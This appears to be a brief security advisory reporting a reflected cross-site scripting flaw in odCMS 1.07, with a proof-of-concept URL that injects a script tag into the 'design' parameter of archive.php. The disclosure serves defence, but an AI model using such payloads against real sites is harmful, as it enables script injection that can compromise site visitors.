Search
Software Vulnerability Tested On Date
odCMS 1.07 Reflected Cross-site Scripting Windows Vista + XAMPP 7/5/2010
Description
An XSS vulnerability in odCMS 1.07 can be exploited to execute arbitrary JavaScript.
Proof of Concept
http://localhost/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E